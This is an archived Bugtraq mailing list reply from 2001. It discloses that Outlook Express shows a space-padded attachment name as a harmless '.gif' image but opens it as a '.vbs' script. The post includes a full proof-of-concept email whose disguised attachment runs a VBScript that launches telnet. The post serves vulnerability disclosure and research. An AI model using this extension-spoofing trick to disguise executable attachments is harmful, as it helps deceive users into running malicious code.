Bugtraq mailing list archives
Re: HTML.dropper
From: Shane Hird <s.hird () STUDENT QUT EDU AU>
Date: Fri, 19 Jan 2001 09:19:45 -0000
Hi, With some testing, I've found that the 'subject- overflow' problem is irrelevant to the 'filename overflow' problem, although as mentioned, this may help to overcome some email filters/scanners. It seems OE is cutting the file name short to a specified length when trying to open it (consequently chopping off the real extension), but not cutting it short when determining which icon to use. (Note that the icon choice doesn't seem to be affected like this with the subject overflow problem.) The following is an example which will produce a 'normal' email, with a standard attachment, however the 'filename' of the attachement is four characters too long, which just happens to be the '.gif' which gets chopped off, leaving just '.vbs'. The filename displayed for the attachment will be 'nicepic.gif', followed by a lot of spaces which obviously aren't seen. Adjust the filename size as necessary for the client in question. I predict a new breed of i-worm to be using this technique in a short while. <snip email.eml> To: "anyone () home com" Subject:anything Date: Fri, 19 Jan 2001 18:44:39 +1000 MIME-Version: 1.0 Content-Type: multipart/mixed; boundary="---- =_NextPart_000_000B_01C08247.E5DF4F00" ------=_NextPart_000_000B_01C08247.E5DF4F00 Content-Type: image/gif; charset=us-ascii Content-Transfer-Encoding: 7bit Content-Disposition: attachment; filename="nicepic.gif .vbs.gif" set WshShell = WScript.CreateObject ("WScript.Shell") WshShell.Run("telnet.exe") ------=_NextPart_000_000B_01C08247.E5DF4F00 </snip> I apologise if this is already known, however I felt it should be clarified for this thread. -Shane
Current thread:
- HTML.dropper http-equiv () excite com (Jan 17)
- Re: HTML.dropper Nick FitzGerald (Jan 18)
- <Possible follow-ups>
- Re: HTML.dropper Shane Hird (Jan 19)